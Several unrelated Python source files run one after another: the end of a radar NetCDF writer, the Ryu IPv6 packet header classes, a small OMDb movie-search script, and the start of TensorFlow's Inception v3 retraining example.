LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
HEIGHT_COLUMN_ORIG,
METRES_TO_KM * numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr(
UNIX_TIME_COLUMN_ORIG,
numpy.int32(metadata_dict[radar_utils.UNIX_TIME_COLUMN]))
netcdf_dataset.setncattr('FractionalTime', 0.)
netcdf_dataset.setncattr('attributes', ' ColorMap SubType Unit')
netcdf_dataset.setncattr('ColorMap-unit', 'dimensionless')
netcdf_dataset.setncattr('ColorMap-value', '')
netcdf_dataset.setncattr('SubType-unit', 'dimensionless')
netcdf_dataset.setncattr('SubType-value', numpy.float(radar_height_m_asl))
netcdf_dataset.setncattr('Unit-unit', 'dimensionless')
netcdf_dataset.setncattr('Unit-value', 'dimensionless')
netcdf_dataset.setncattr(
LAT_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LAT_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
LNG_SPACING_COLUMN_ORIG, rounder.round_to_nearest(
metadata_dict[radar_utils.LNG_SPACING_COLUMN],
LATLNG_MULTIPLE_DEG))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[0], numpy.double(-99000.))
netcdf_dataset.setncattr(
SENTINEL_VALUE_COLUMNS_ORIG[1], numpy.double(-99001.))
min_latitude_deg = metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN] - (
metadata_dict[radar_utils.LAT_SPACING_COLUMN] *
(metadata_dict[radar_utils.NUM_LAT_COLUMN] - 1))
unique_grid_point_lats_deg, unique_grid_point_lngs_deg = (
grids.get_latlng_grid_points(
min_latitude_deg=min_latitude_deg,
min_longitude_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN],
num_rows=metadata_dict[radar_utils.NUM_LAT_COLUMN],
num_columns=metadata_dict[radar_utils.NUM_LNG_COLUMN]))
num_grid_rows = len(unique_grid_point_lats_deg)
num_grid_columns = len(unique_grid_point_lngs_deg)
field_vector = numpy.reshape(field_matrix, num_grid_rows * num_grid_columns)
grid_point_lat_matrix, grid_point_lng_matrix = (
grids.latlng_vectors_to_matrices(
unique_grid_point_lats_deg, unique_grid_point_lngs_deg))
grid_point_lat_vector = numpy.reshape(
grid_point_lat_matrix, num_grid_rows * num_grid_columns)
grid_point_lng_vector = numpy.reshape(
grid_point_lng_matrix, num_grid_rows * num_grid_columns)
real_value_indices = numpy.where(numpy.invert(numpy.isnan(field_vector)))[0]
netcdf_dataset.createDimension(
NUM_LAT_COLUMN_ORIG, num_grid_rows - 1)
netcdf_dataset.createDimension(
NUM_LNG_COLUMN_ORIG, num_grid_columns - 1)
netcdf_dataset.createDimension(
NUM_PIXELS_COLUMN_ORIG, len(real_value_indices))
row_index_vector, column_index_vector = radar_utils.latlng_to_rowcol(
grid_point_lat_vector, grid_point_lng_vector,
nw_grid_point_lat_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LAT_COLUMN],
nw_grid_point_lng_deg=
metadata_dict[radar_utils.NW_GRID_POINT_LNG_COLUMN],
lat_spacing_deg=metadata_dict[radar_utils.LAT_SPACING_COLUMN],
lng_spacing_deg=metadata_dict[radar_utils.LNG_SPACING_COLUMN])
netcdf_dataset.createVariable(
field_name_myrorss, numpy.single, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_ROW_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
GRID_COLUMN_COLUMN_ORIG, numpy.int16, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.createVariable(
NUM_GRID_CELL_COLUMN_ORIG, numpy.int32, (NUM_PIXELS_COLUMN_ORIG,))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'BackgroundValue', numpy.int32(-99900))
netcdf_dataset.variables[field_name_myrorss].setncattr(
'units', 'dimensionless')
netcdf_dataset.variables[field_name_myrorss].setncattr(
'NumValidRuns', numpy.int32(len(real_value_indices)))
netcdf_dataset.variables[field_name_myrorss][:] = field_vector[
real_value_indices]
netcdf_dataset.variables[GRID_ROW_COLUMN_ORIG][:] = (
row_index_vector[real_value_indices])
netcdf_dataset.variables[GRID_COLUMN_COLUMN_ORIG][:] = (
column_index_vector[real_value_indices])
netcdf_dataset.variables[NUM_GRID_CELL_COLUMN_ORIG][:] = (
numpy.full(len(real_value_indices), 1, dtype=int))
netcdf_dataset.close()
| |
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import six
import struct
from . import packet_base
from . import icmpv6
from . import tcp
from . import udp
from . import sctp
from . import gre
from . import in_proto as inet
from ryu.lib import addrconv
from ryu.lib import stringify
IPV6_ADDRESS_PACK_STR = '!16s'
IPV6_ADDRESS_LEN = struct.calcsize(IPV6_ADDRESS_PACK_STR)
IPV6_PSEUDO_HEADER_PACK_STR = '!16s16s3xB'
class ipv6(packet_base.PacketBase):
"""IPv6 (RFC 2460) header encoder/decoder class.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
IPv6 addresses are represented as a string like 'ff02::1'.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|p{30em}|l|
============== ======================================== ==================
Attribute Description Example
============== ======================================== ==================
version Version
traffic_class Traffic Class
flow_label When decoding, Flow Label.
When encoding, the most significant 8
bits of Flow Label.
payload_length Payload Length
nxt Next Header
hop_limit Hop Limit
src Source Address 'ff02::1'
dst Destination Address '::'
ext_hdrs Extension Headers
============== ======================================== ==================
"""
_PACK_STR = '!IHBB16s16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
_IPV6_EXT_HEADER_TYPE = {}
_TYPE = {
'ascii': [
'src', 'dst'
]
}
@staticmethod
def register_header_type(type_):
def _register_header_type(cls):
ipv6._IPV6_EXT_HEADER_TYPE[type_] = cls
return cls
return _register_header_type
def __init__(self, version=6, traffic_class=0, flow_label=0,
payload_length=0, nxt=inet.IPPROTO_TCP, hop_limit=255,
src='10::10', dst='20::20', ext_hdrs=None):
super(ipv6, self).__init__()
self.version = version
self.traffic_class = traffic_class
self.flow_label = flow_label
self.payload_length = payload_length
self.nxt = nxt
self.hop_limit = hop_limit
self.src = src
self.dst = dst
ext_hdrs = ext_hdrs or []
assert isinstance(ext_hdrs, list)
for ext_hdr in ext_hdrs:
assert isinstance(ext_hdr, header)
self.ext_hdrs = ext_hdrs
@classmethod
def parser(cls, buf):
(v_tc_flow, payload_length, nxt, hlim, src, dst) = struct.unpack_from(
cls._PACK_STR, buf)
version = v_tc_flow >> 28
traffic_class = (v_tc_flow >> 20) & 0xff
flow_label = v_tc_flow & 0xfffff
hop_limit = hlim
offset = cls._MIN_LEN
last = nxt
ext_hdrs = []
while True:
cls_ = cls._IPV6_EXT_HEADER_TYPE.get(last)
if not cls_:
break
hdr = cls_.parser(buf[offset:])
ext_hdrs.append(hdr)
offset += len(hdr)
last = hdr.nxt
msg = cls(version, traffic_class, flow_label, payload_length,
nxt, hop_limit, addrconv.ipv6.bin_to_text(src),
addrconv.ipv6.bin_to_text(dst), ext_hdrs)
return (msg, ipv6.get_packet_type(last),
buf[offset:offset + payload_length])
def serialize(self, payload, prev):
hdr = bytearray(40)
v_tc_flow = (self.version << 28 | self.traffic_class << 20 |
self.flow_label)
struct.pack_into(ipv6._PACK_STR, hdr, 0, v_tc_flow,
self.payload_length, self.nxt, self.hop_limit,
addrconv.ipv6.text_to_bin(self.src),
addrconv.ipv6.text_to_bin(self.dst))
if self.ext_hdrs:
for ext_hdr in self.ext_hdrs:
hdr.extend(ext_hdr.serialize())
if 0 == self.payload_length:
payload_length = len(payload)
for ext_hdr in self.ext_hdrs:
payload_length += len(ext_hdr)
self.payload_length = payload_length
struct.pack_into('!H', hdr, 4, self.payload_length)
return hdr
def __len__(self):
ext_hdrs_len = 0
for ext_hdr in self.ext_hdrs:
ext_hdrs_len += len(ext_hdr)
return self._MIN_LEN + ext_hdrs_len
ipv6.register_packet_type(icmpv6.icmpv6, inet.IPPROTO_ICMPV6)
ipv6.register_packet_type(tcp.tcp, inet.IPPROTO_TCP)
ipv6.register_packet_type(udp.udp, inet.IPPROTO_UDP)
ipv6.register_packet_type(sctp.sctp, inet.IPPROTO_SCTP)
ipv6.register_packet_type(gre.gre, inet.IPPROTO_GRE)
@six.add_metaclass(abc.ABCMeta)
class header(stringify.StringifyMixin):
"""extension header abstract class."""
def __init__(self, nxt):
self.nxt = nxt
@classmethod
@abc.abstractmethod
def parser(cls, buf):
pass
@abc.abstractmethod
def serialize(self):
pass
@abc.abstractmethod
def __len__(self):
pass
class opt_header(header):
"""an abstract class for Hop-by-Hop Options header and destination
header."""
_PACK_STR = '!BB'
_MIN_LEN = struct.calcsize(_PACK_STR)
_FIX_SIZE = 8
_class_prefixes = ['option']
@abc.abstractmethod
def __init__(self, nxt, size, data):
super(opt_header, self).__init__(nxt)
assert not (size % 8)
self.size = size
self.data = data
@classmethod
def parser(cls, buf):
(nxt, len_) = struct.unpack_from(cls._PACK_STR, buf)
data_len = cls._FIX_SIZE + int(len_)
data = []
size = cls._MIN_LEN
while size < data_len:
(type_, ) = struct.unpack_from('!B', buf[size:])
if type_ == 0:
opt = option(type_, -1, None)
size += 1
else:
opt = option.parser(buf[size:])
size += len(opt)
data.append(opt)
return cls(nxt, len_, data)
def serialize(self):
buf = struct.pack(self._PACK_STR, self.nxt, self.size)
buf = bytearray(buf)
if self.data is None:
self.data = [option(type_=1, len_=4,
data=b'\x00\x00\x00\x00')]
for opt in self.data:
buf.extend(opt.serialize())
return buf
def __len__(self):
return self._FIX_SIZE + self.size
@ipv6.register_header_type(inet.IPPROTO_HOPOPTS)
class hop_opts(opt_header):
"""IPv6 (RFC 2460) Hop-by-Hop Options header encoder/decoder class.
This is used with ryu.lib.packet.ipv6.ipv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
nxt Next Header
size the length of the Hop-by-Hop Options header,
not include the first 8 octet.
data IPv6 options.
============== =======================================
"""
TYPE = inet.IPPROTO_HOPOPTS
def __init__(self, nxt=inet.IPPROTO_TCP, size=0, data=None):
super(hop_opts, self).__init__(nxt, size, data)
@ipv6.register_header_type(inet.IPPROTO_DSTOPTS)
class dst_opts(opt_header):
"""IPv6 (RFC 2460) destination header encoder/decoder class.
This is used with ryu.lib.packet.ipv6.ipv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
nxt Next Header
size the length of the destination header,
not include the first 8 octet.
data IPv6 options.
============== =======================================
"""
TYPE = inet.IPPROTO_DSTOPTS
def __init__(self, nxt=inet.IPPROTO_TCP, size=0, data=None):
super(dst_opts, self).__init__(nxt, size, data)
class option(stringify.StringifyMixin):
"""IPv6 (RFC 2460) Options header encoder/decoder class.
This is used with ryu.lib.packet.ipv6.hop_opts or
ryu.lib.packet.ipv6.dst_opts.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
type\_ option type.
len\_ the length of data. -1 if type\_ is 0.
data an option value. None if len\_ is 0 or -1.
============== =======================================
"""
_PACK_STR = '!BB'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, type_=0, len_=-1, data=None):
self.type_ = type_
self.len_ = len_
self.data = data
@classmethod
def parser(cls, buf):
(type_, ) = struct.unpack_from('!B', buf)
if not type_:
cls_ = cls(type_, -1, None)
else:
data = None
(type_, len_) = struct.unpack_from(cls._PACK_STR, buf)
if len_:
form = "%ds" % len_
(data, ) = struct.unpack_from(form, buf, cls._MIN_LEN)
cls_ = cls(type_, len_, data)
return cls_
def serialize(self):
data = None
if not self.type_:
data = struct.pack('!B', self.type_)
elif not self.len_:
data = struct.pack(self._PACK_STR, self.type_, self.len_)
else:
form = "%ds" % self.len_
data = struct.pack(self._PACK_STR + form, self.type_,
self.len_, self.data)
return data
def __len__(self):
return self._MIN_LEN + self.len_
@ipv6.register_header_type(inet.IPPROTO_ROUTING)
class routing(header):
"""An IPv6 Routing Header decoder class.
This class has only the parser method.
IPv6 Routing Header types.
http://www.iana.org/assignments/ipv6-parameters/ipv6-parameters.xhtml
+-----------+----------------------------------+-------------------+
| Value | Description | Reference |
+===========+==================================+===================+
| 0 | Source Route (DEPRECATED) | [[IPV6]][RFC5095] |
+-----------+----------------------------------+-------------------+
| 1 | Nimrod (DEPRECATED 2009-05-06) | |
+-----------+----------------------------------+-------------------+
| 2 | Type 2 Routing Header | [RFC6275] |
+-----------+----------------------------------+-------------------+
| 3 | RPL Source Route Header | [RFC6554] |
+-----------+----------------------------------+-------------------+
| 4 - 252 | Unassigned | |
+-----------+----------------------------------+-------------------+
| 253 | RFC3692-style Experiment 1 [2] | [RFC4727] |
+-----------+----------------------------------+-------------------+
| 254 | RFC3692-style Experiment 2 [2] | [RFC4727] |
+-----------+----------------------------------+-------------------+
| 255 | Reserved | |
+-----------+----------------------------------+-------------------+
"""
TYPE = inet.IPPROTO_ROUTING
_OFFSET_LEN = struct.calcsize('!2B')
# IPv6 Routing Header Type
ROUTING_TYPE_2 = 0x02
ROUTING_TYPE_3 = 0x03
@classmethod
def parser(cls, buf):
(type_, ) = struct.unpack_from('!B', buf, cls._OFFSET_LEN)
switch = {
# TODO: make parsers of type2.
cls.ROUTING_TYPE_2: None,
cls.ROUTING_TYPE_3: routing_type3
}
cls_ = switch.get(type_)
if cls_:
return cls_.parser(buf)
else:
return None
class routing_type3(header):
"""
An IPv6 Routing Header for Source Routes with the RPL (RFC 6554)
encoder/decoder class.
This is used with ryu.lib.packet.ipv6.ipv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
nxt Next Header
size The length of the Routing header,
not include the first 8 octet.
(0 means automatically-calculate when encoding)
type Identifies the particular Routing header variant.
seg Number of route segments remaining.
cmpi Number of prefix octets from segments 1 through n-1.
cmpe Number of prefix octets from segment n.
pad Number of octets that are used for padding
after Address[n] at the end of the SRH.
adrs Vector of addresses, numbered 1 to n.
============== =======================================
"""
_PACK_STR = '!BBBBBB2x'
_MIN_LEN = struct.calcsize(_PACK_STR)
_TYPE = {
'asciilist': [
'adrs'
]
}
def __init__(self, nxt=inet.IPPROTO_TCP, size=0,
type_=3, seg=0, cmpi=0, cmpe=0, adrs=None):
super(routing_type3, self).__init__(nxt)
self.size = size
self.type_ = type_
self.seg = seg
self.cmpi = cmpi
self.cmpe = cmpe
adrs = adrs or []
assert isinstance(adrs, list)
self.adrs = adrs
self._pad = (8 - ((len(self.adrs) - 1) * (16 - self.cmpi) +
(16 - self.cmpe) % 8)) % 8
@classmethod
def _get_size(cls, size):
return (int(size) + 1) * 8
@classmethod
def parser(cls, buf):
(nxt, size, type_, seg, cmp_, pad) = struct.unpack_from(
cls._PACK_STR, buf)
data = cls._MIN_LEN
header_len = cls._get_size(size)
cmpi = int(cmp_ >> 4)
cmpe = int(cmp_ & 0xf)
pad = int(pad >> 4)
adrs = []
if size:
# Address[1..n-1] has size (16 - CmprI) octets
adrs_len_i = 16 - cmpi
# Address[n] has size (16 - CmprE) octets
adrs_len_e = 16 - cmpe
form_i = "%ds" % adrs_len_i
form_e = "%ds" % adrs_len_e
while data < (header_len - (adrs_len_e + pad)):
(adr, ) = struct.unpack_from(form_i, buf[data:])
adr = (b'\x00' * cmpi) + adr
adrs.append(addrconv.ipv6.bin_to_text(adr))
data += adrs_len_i
(adr, ) = struct.unpack_from(form_e, buf[data:])
adr = (b'\x00' * cmpe) + adr
adrs.append(addrconv.ipv6.bin_to_text(adr))
return cls(nxt, size, type_, seg, cmpi, cmpe, adrs)
def serialize(self):
if self.size == 0:
self.size = ((len(self.adrs) - 1) * (16 - self.cmpi) +
(16 - self.cmpe) + self._pad) // 8
buf = struct.pack(self._PACK_STR, self.nxt, self.size,
self.type_, self.seg, (self.cmpi << 4) | self.cmpe,
self._pad << 4)
buf = bytearray(buf)
if self.size:
form_i = "%ds" % (16 - self.cmpi)
form_e = "%ds" % (16 - self.cmpe)
slice_i = slice(self.cmpi, 16)
slice_e = slice(self.cmpe, 16)
for adr in self.adrs[:-1]:
buf.extend(
struct.pack(
form_i, addrconv.ipv6.text_to_bin(adr)[slice_i]))
buf.extend(struct.pack(
form_e,
addrconv.ipv6.text_to_bin(self.adrs[-1])[slice_e]))
return buf
def __len__(self):
return routing_type3._get_size(self.size)
@ipv6.register_header_type(inet.IPPROTO_FRAGMENT)
class fragment(header):
"""IPv6 (RFC 2460) fragment header encoder/decoder class.
This is used with ryu.lib.packet.ipv6.ipv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
nxt Next Header
offset offset, in 8-octet units, relative to
the start of the fragmentable part of
the original packet.
more 1 means more fragments follow;
0 means last fragment.
id\_ packet identification value.
============== =======================================
"""
TYPE = inet.IPPROTO_FRAGMENT
_PACK_STR = '!BxHI'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, nxt=inet.IPPROTO_TCP, offset=0, more=0, id_=0):
super(fragment, self).__init__(nxt)
self.offset = offset
self.more = more
self.id_ = id_
@classmethod
def parser(cls, buf):
(nxt, off_m, id_) = struct.unpack_from(cls._PACK_STR, buf)
offset = off_m >> 3
more = off_m & 0x1
return cls(nxt, offset, more, id_)
def serialize(self):
off_m = (self.offset << 3 | self.more)
buf = struct.pack(self._PACK_STR, self.nxt, off_m, self.id_)
return buf
def __len__(self):
return self._MIN_LEN
@ipv6.register_header_type(inet.IPPROTO_AH)
class auth(header):
"""IP Authentication header (RFC 2402) encoder/decoder class.
This is used with ryu.lib.packet.ipv6.ipv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the corresponding args in this order.
.. tabularcolumns:: |l|L|
============== =======================================
Attribute Description
============== =======================================
nxt Next Header
size the length of the Authentication Header
in 64-bit words, subtracting 1.
spi security parameters index.
seq sequence number.
data authentication data.
============== =======================================
"""
TYPE = inet.IPPROTO_AH
_PACK_STR = '!BB2xII'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, nxt=inet.IPPROTO_TCP, size=2, spi=0, seq=0,
data=b'\x00\x00\x00\x00'):
super(auth, self).__init__(nxt)
assert data is not None
self.size = size
self.spi = spi
self.seq = seq
self.data = data
@classmethod
def _get_size(cls, size):
return (int(size) + 2) * 4
@classmethod
def parser(cls, buf):
(nxt, size, spi, seq) = struct.unpack_from(cls._PACK_STR, buf)
form = "%ds" % (cls._get_size(size) - cls._MIN_LEN)
(data, ) = struct.unpack_from(form, buf, cls._MIN_LEN)
return cls(nxt, size, spi, seq, data)
def serialize(self):
buf = struct.pack(self._PACK_STR, self.nxt, self.size, self.spi,
self.seq)
buf = bytearray(buf)
form = "%ds" % (auth._get_size(self.size) - self._MIN_LEN)
buf.extend(struct.pack(form, self.data))
return buf
def __len__(self):
return auth._get_size(self.size)
ipv6.set_classes(ipv6._IPV6_EXT_HEADER_TYPE)
| |
#===============================================================================
# OMDb API Search Script - Module - getdat
#-------------------------------------------------------------------------------
# Version: 0.1.3
# Updated: 03-11-2013
# Author: Alex C.
# License: MIT
#-------------------------------------------------------------------------------
# Notes
#===============================================================================
"""
Contains functions for retrieving movie data, either from a JSON file,
or from the OMDb API.
"""
#===============================================================================
# IMPORTS
#===============================================================================
import glob
import json
import msvcrt
import urllib2
from const import *
import dispdat
#===============================================================================
# LOCAL CACHE FOR STORING PAST SEARCHES
#===============================================================================
cache = []
#===============================================================================
# GET USER INPUT
#===============================================================================
def getinput (msg=""):
""""""
# if OSNAME in ["nt", "dos"]:
# if msg is not "":
# print msg
# cmd = msvcrt.getch()
# elif OSNAME is "posix":
# cmd = raw_input(msg)
cmd = raw_input(msg)
return cmd
#===============================================================================
# GET DATA FROM JSON FILE
#===============================================================================
def fromfile (filelist, ret=False):
""""""
global cache
dupe = False
thefile = None
choice = None
loaded = None
print HR
userinput = getinput("File: ")
try:
choice = (int(userinput) - 1)
except:
choice = userinput
try:
if choice is not "":
if type(choice) is int:
thefile = open(filelist[choice], 'r')
loaded = filelist[choice]
elif type(choice) is str:
thefile = open(choice, 'r')
loaded = choice
except (IOError, IndexError):
print "Can't find that file." + NL
return fromfile()
if thefile is not None:
movdata = json.load(thefile)
for mov in movdata:
for mov2 in cache:
if mov[MKEY[1]] == mov2[MKEY[1]]:
dupe = True
if not dupe:
cache.append(mov)
print "File loaded."
if thefile is not None:
thefile.close()
if ret:
return loaded
def localfiles (format="json"):
""""""
filelist = glob.glob("*." + format)
return filelist
#===============================================================================
# GET DATA FROM OMDB API - IMDB ID
#===============================================================================
def withid (theid):
""""""
global cache
dupe = False
theurl = "{0}{1}{2}{3}{4}".format(OMDBURL, Q[1], theid, PLOT[1], QOP[3])
response = urllib2.urlopen(theurl)
movdata = json.load(response)
for mov in cache:
if movdata[MKEY[1]] == mov[MKEY[1]]:
dupe = True
if not dupe:
cache.append(movdata)
#===============================================================================
# GET DATA FROM OMDB API - TITLE
#===============================================================================
def withtitle (thetitle, year=None):
""""""
dupe = False
response = None
newtitle = enctitle(thetitle)
theurl = "{0}{1}{2}{3}{4}".format(OMDBURL, Q[2], newtitle, PLOT[1], QOP[3])
theurl2 = "{0}{1}{2}{3}{4}{5}{6}".format(OMDBURL, Q[2], newtitle, QOP[0],
year, PLOT[1], QOP[3])
if year == None:
theurl = "{0}{1}{2}{3}{4}".format(OMDBURL, Q[2], newtitle, PLOT[1],
QOP[3])
response = urllib2.urlopen(theurl)
elif year != None:
theurl2 = "{0}{1}{2}{3}{4}{5}{6}".format(OMDBURL, Q[2], newtitle, QOP[0],
year, PLOT[1], QOP[3])
response = urllib2.urlopen(theurl2)
movdata = json.load(response)
for mov in cache:
if movdata[MKEY[1]] == mov[MKEY[1]]:
dupe = True
if not dupe:
cache.append(movdata)
#===============================================================================
# GET DATA FROM OMDB API - GENERAL SEARCH
#===============================================================================
def gensearch (thetitle):
""""""
matches = []
newtitle = enctitle(thetitle)
theurl = "{0}{1}{2}".format(OMDBURL, Q[0], newtitle)
response = urllib2.urlopen(theurl)
movdata = json.load(response)
for mov in movdata[MKEY[1]]:
if mov[MKEY[2]] == "movie":
matches.append(mov)
if len(matches) > 0 < 10:
index = 1
print "Which one?" + NL
for mov in matches:
print "[{0}] {1} ({2})".format(str(index), mov[MKEY[3]],
mov[MKEY[4]])
index += 1
print
newchoice = raw_input("Enter 1 - " + str(len(matches)) + ": ")
newchoice = int(newchoice) - 1
withid(matches[newchoice][MKEY[1]])
#===============================================================================
# MISC. FUNCTIONS
#===============================================================================
def enctitle (title):
"""Encodes a string for a URL"""
return urllib2.quote(title)
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple transfer learning with an Inception v3 architecture model which
displays summaries in TensorBoard.
This example shows how to take a Inception v3 architecture model trained on
ImageNet images, and train a new top layer that can recognize other classes of
images.
The top layer receives as input a 2048-dimensional vector for each image. We
train a softmax layer on top of this representation. Assuming the softmax layer
contains N labels, this corresponds to learning N + 2048*N model parameters
corresponding to the learned biases and weights.
Here's an example, which assumes you have a folder containing class-named
subfolders, each full of images for each label. The example folder flower_photos
should have a structure like this:
~/flower_photos/daisy/photo1.jpg
~/flower_photos/daisy/photo2.jpg
...
~/flower_photos/rose/anotherphoto77.jpg
...
~/flower_photos/sunflower/somepicture.jpg
The subfolder names are important, since they define what label is applied to
each image, but the filenames themselves don't matter. Once your images are
prepared, you can run the training with a command like this:
bazel build tensorflow/examples/image_retraining:retrain && \
bazel-bin/tensorflow/examples/image_retraining/retrain \
--image_dir ~/flower_photos
You can replace the image_dir argument with any folder containing subfolders of
images. The label for each image is taken from the name of the subfolder it's
in.
This produces a new model file that can be loaded and run by any TensorFlow
program, for example the label_image sample code.
To use with TensorBoard:
By default, this script will log summaries to /tmp/retrain_logs directory
Visualize the summaries with this command:
tensorboard --logdir /tmp/retrain_logs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from datetime import datetime
import hashlib
import os.path
import random
import re
import struct
import os
import sys
import tarfile
import numpy as np
from six.moves import urllib
import tensorflow as tf
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import gfile
from tensorflow.python.util import compat
FLAGS = None
# These are all parameters that are tied to the particular model architecture
# we're using for Inception v3. These include things like tensor names and their
# sizes. If you want to adapt this script to work with another model, you will
# need to update these to reflect the values in the network you're using.
# pylint: disable=line-too-long
DATA_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'
# pylint: enable=line-too-long
BOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'
BOTTLENECK_TENSOR_SIZE = 2048
MODEL_INPUT_WIDTH = 299
MODEL_INPUT_HEIGHT = 299
MODEL_INPUT_DEPTH = 3
JPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'
RESIZED_INPUT_TENSOR_NAME = 'ResizeBilinear:0'
MAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M
def create_image_lists(image_dir, testing_percentage, validation_percentage):
"""Builds a list of training images from the file system.
Analyzes the sub folders in the image directory, splits them into stable
training, testing, and validation sets, and returns a data structure
describing the lists of images for each label and their paths.
Args:
image_dir: String path to a folder containing subfolders of images.
testing_percentage: Integer percentage of the images to reserve for tests.
validation_percentage: Integer percentage of images reserved for validation.
Returns:
A dictionary containing an entry for each label subfolder, with images split
into training, testing, and validation sets within each label.
"""
if not gfile.Exists(image_dir):
print("Image directory '" + image_dir + "' not found.")
return None
result = {}
sub_dirs = [x[0] for x in gfile.Walk(image_dir)]
# The root directory comes first, so skip it.
is_root_dir = True
for sub_dir in sub_dirs:
if is_root_dir:
is_root_dir = False
continue
extensions = ['jpg', 'jpeg', 'JPG', 'JPEG']
file_list = []
dir_name = os.path.basename(sub_dir)
if dir_name == image_dir:
continue
print("Looking for images in '" + dir_name + "'")
for extension in extensions:
file_glob = os.path.join(image_dir, dir_name, '*.' + extension)
file_list.extend(gfile.Glob(file_glob))
if not file_list:
print('No files found')
continue
if len(file_list) < 20:
print('WARNING: Folder has less than 20 images, which may cause issues.')
elif len(file_list) > MAX_NUM_IMAGES_PER_CLASS:
print('WARNING: Folder {} has more than {} images. Some images will '
'never be selected.'.format(dir_name, MAX_NUM_IMAGES_PER_CLASS))
label_name = re.sub(r'[^a-z0-9]+', ' ', dir_name.lower())
training_images = []
testing_images = []
validation_images = []
for file_name in file_list:
base_name = os.path.basename(file_name)
# We want to ignore anything after '_nohash_' in the file name when
# deciding which set to put an image in, the data set creator has a way of
# grouping photos that are close variations of each other. For example
# this is used in the plant disease data set to group multiple pictures of
# the same leaf.
hash_name = re.sub(r'_nohash_.*$', '', file_name)
# This looks a bit magical, but we need to decide whether this file should
# go into the training, testing, or validation sets, and we want to keep
# existing files in the same set even if more files are subsequently
# added.
# To do that, we need a stable way of deciding based on just the file name
# itself, so we do a hash of that and then use that to generate a
# probability value that we use to assign it.
hash_name_hashed = hashlib.sha1(compat.as_bytes(hash_name)).hexdigest()
percentage_hash = ((int(hash_name_hashed, 16) %
(MAX_NUM_IMAGES_PER_CLASS + 1)) *
(100.0 / MAX_NUM_IMAGES_PER_CLASS))
if percentage_hash < validation_percentage:
validation_images.append(base_name)
elif percentage_hash < (testing_percentage + validation_percentage):
testing_images.append(base_name)
else:
training_images.append(base_name)
result[label_name] = {
'dir': dir_name,
'training': training_images,
'testing': testing_images,
'validation': validation_images,
}
return result
def get_image_path(image_lists, label_name, index, image_dir, category):
""""Returns a path to an image for a label at the given index.
Args:
image_lists: Dictionary of training images for each label.
label_name: Label string we want to get an image for.
index: Int offset of the image we want. This will be moduloed by the
available number of images for the label, so it can be arbitrarily large.
image_dir: Root folder string of the subfolders containing the training
images.
category: Name string of set to pull images from - training, testing, or
validation.
Returns:
File system path string to an image that meets the requested parameters.
"""
if label_name not in image_lists:
tf.logging.fatal('Label does not exist %s.', label_name)
label_lists = image_lists[label_name]
if category not in label_lists:
tf.logging.fatal('Category does not exist %s.', category)
category_list = label_lists[category]
if not category_list:
tf.logging.fatal('Label %s has no images in the category %s.',
label_name, category)
mod_index = index % len(category_list)
base_name = category_list[mod_index]
sub_dir = label_lists['dir']
full_path = os.path.join(image_dir, sub_dir, base_name)
return full_path
